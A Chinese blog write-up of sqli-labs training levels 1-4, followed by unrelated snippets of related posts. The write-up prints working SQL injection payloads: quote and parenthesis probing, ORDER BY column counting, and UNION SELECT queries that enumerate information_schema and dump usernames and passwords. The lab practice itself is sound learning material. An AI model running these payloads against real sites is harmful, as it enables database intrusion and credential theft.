代码编织梦想

第一关

判断注入点:
?id=1 回显正常
在这里插入图片描述?id=1’ 回显错误
在这里插入图片描述可以判断出是基于单引号注入
然后and判断一下
?id=1’ and 1=1 回显正常
在这里插入图片描述?id=1’ and 1=2 回显错误
在这里插入图片描述证明存在注入漏洞
则or 相反
?id=1’ or 1=2 --+ (回显正常)
?id=1’ or 1=1 --+ (回显错误,证明存在注入漏洞)//(暂时没验证)
然后我们判断一下列数
?id=1’ order by 3 --+(没报错)
?id=1’ order by 4 --+ (报错)
证明列数为3
在这里插入图片描述然后我们将前面置为错误
为什么要将前面置为错误呢?
因为他的显示位只有一个,只有让前边的报错,才能让后边的正常执行
联合查询一下
?id=1’ and 1=2 union select 1,2,3 --+ //注意and后面有空格
在这里插入图片描述基于上述的简单联合查询
进行爆表

?id=1' and 1=2 union select 1,group_concat(schema_name),3 from information_schema.schemata --+

在这里插入图片描述
在这里插入图片描述然后基于上述进行爆表
咱们进行爆security库内的表

?id=1' and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema="security" --+

在这里插入图片描述

在这里插入图片描述爆出来的表有一个users对我们有用(渗透思维)
搞他
爆字段

?id=1' and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_name="users" --+

在这里插入图片描述在这里插入图片描述终于快拿到自己想要的了
爆字段里面的数据
有用的也就username和password了

爆字段里面的数据

?id=1' and 1=2 union select 1,group_concat(username,0x5c,password),3 from  users --+   

注意0x5c是\转义符
在这里插入图片描述在这里插入图片描述终于完成了
可以回去睡觉了
因为前四关都是一样的我就来写一下判断注入点步骤

第二关是整数型

?id=1 and 1=2 --+ (报错)
?id=1 and 1=1 --+ (正常执行)
存在整数型注入点

在这里插入图片描述验证一下
剩下的爆库和第一关的一样就好

在这里插入图片描述

第三关

判断注入点
?id=1’) and 1=1 --+ (回显正常)
?id=1’) and 1=2 --+ (回显错误)
存在’)的注入点
在这里插入图片描述验证一下
在这里插入图片描述第四关:
源码分析
在这里插入图片描述因为$id一开始传参的时候就被包裹了双引号,因为在php中.是连接符,单引号里面的是要要引用的字符,下边执行sql查询语句的时候,又被括号包裹,所以注入点是(‘’)

判断注入点:
?id=1") and 1=2 --+ (回显错误)
?id=1") and 1=1 --+ (回显正确)
基于”)的注入点
验证一下
在这里插入图片描述

版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。 本文链接: https://blog.csdn.net/qq_46527080/article/details/111086579

docker容器中安装mysql-爱代码爱编程

文章概要 获取mysql镜像查看本地镜像列表安装mysql镜像查看运行的镜像进入mysql容器获取mysql镜像 docker pull mysql:5.7.27 查看本地镜像列表 docker images 运行mysql镜像 docker run -p 3306:3306 --name mysql \ -v /usr/local/docke

MySQL存储过程和函数-爱代码爱编程

变量 系统变量 变量由系统提供,不是用户定义的,属于服务器层面 查看所有系统变量SHOW GLOBAL|SESSION VARIABLES; 查看满足条件的部分系统变量SHOW GLOBAL|SESSION VARIABLES LIKE '%char%' 查看指定的某一个系统变量SELECT @@global|session.系统变量名;

Task00/01:数据库环境搭建及初步了解-爱代码爱编程

数据库环境搭建及初步了解 Task00:绪论 - 环境搭建Task01:初识数据库练习题 Task00:绪论 - 环境搭建 如何安装mysql8.0 Task01:初识数据库 练习题 1.1 编写一条 CREATE TABLE 语句,用来创建一个包含表 1-A 中所列各项的表 Addressbook (地址簿),并为 regist_no

mysql sql语句大全[留着学习用]-爱代码爱编程

1、说明:创建数据库 CREATE  DATABASE  database - name 2、说明:删除数据库 drop  database  dbname 3、说明:备份sql server --- 创建 备份数据的 device USE master EXEC  sp_addumpdevice  'disk' ,  'testBack' 

JDBC三种数据库连接池--c3p0&&dbcp&&druid-爱代码爱编程

1.1 JDBC数据库连接池的必要性 在使用开发基于数据库的web程序时,传统的模式基本是按以下步骤: 在主程序(如servlet、beans)中建立数据库连接进行sql操作断开数据库连接这种模式开发,存在的问题: 普通的JDBC数据库连接使用 DriverManager 来获取,每次向数据库建立连接的时候都要将 Connection 加载到

on duplicate key update-爱代码爱编程

  import pymysql as pq from random_PersonName2 import random_name import datetime try: print('连接到mysql服务器...') conn = pq.connect( host='127.0.0.1', port=

浅谈PHP反序列化字符逃逸-爱代码爱编程

本文目录 前言0x01 序列化和反序列化serialize()unserialize()0x02 字符逃逸字符变多字符减少总结 前言 最近遇到了这个知识点,网上找了好几篇这方面的好像都不太仔细,自己来总结下 0x01 序列化和反序列化 serialize() 所有php里面的值都可以使用函数serialize()来返回一个包含字节流的字

【PHP】函数echo,print,print_r,var_dump的区别-爱代码爱编程

var_dump()函数 判断一个变量的类型与长度,并输出变量的数值,如果变量有值,输出的是变量的值,并返回数据类型。此函数显示关于一个或多个表达式的结构信息,包括表达式的类型和值。数组将递归展开值,通过缩进显示其结构。 $a = "Hello"; //字符串 $b = 1433223; //整型 $c = array("Apple","Orang

强制修改/移除 WordPress 主题底部版权标识-爱代码爱编程

目录: 一、常用的方法——直接在主题编辑器里面改 二、万能的方法——在 Linux 系统中改 php 内容 一、常用的方法——直接在主题编辑器里面改 1、打开 WordPress 后台管理,点击【外观】 2、点击【主题编辑器】 3、在主题文件栏,选中【主题页脚】footer.php,这是页脚的 php 文件 4、找到 printf 函数,将后面括号里的

sqli-labs靶场5-6关(双查询注入)-爱代码爱编程

知识点 双查询注入的知识点 原理:双注入查询需要联合着MYSQL的BUG报错来进行报错注入 BUG:当在一个聚合函数,比如count函数后面如果使用分组语句就会把查询的一部分一错误形式显示出来; 双查询在命令行中直观显示出来 select count(*),concat((select user()),(floor(rand() * 2))) as

sqli-labs靶场7关(知道根目录的注入)-爱代码爱编程

知识点 首先要掌握一下相关的函数和知识点 函数: load_file()函数 是MySQL读取本地文件的函数(读取) into outfile()函数 是用来导出文件的(写入) @@basedir函数 查询当前路径 @@datadir函数 查询数据库安装路径 1.load_file()函数用法2.into outfile()函数用法查看

GitHub标星7.3k+,这款程序员代码补全工具,让你的编程效率飞起来!-爱代码爱编程

  今天小编推荐一款代码补全工具,堪称代码神器,他叫TabNine。   TabNine支持23种编程语言、5种编辑器,使用简单,效果惊艳。不少使用过的网友说:TabNine是他们用过的最好的代码补全工具,这是属于程序员的杀手级应用。   在VS Code的扩展商店里,TabNine已经被下载1.3万次,获得全5星好评。 Deep TabNine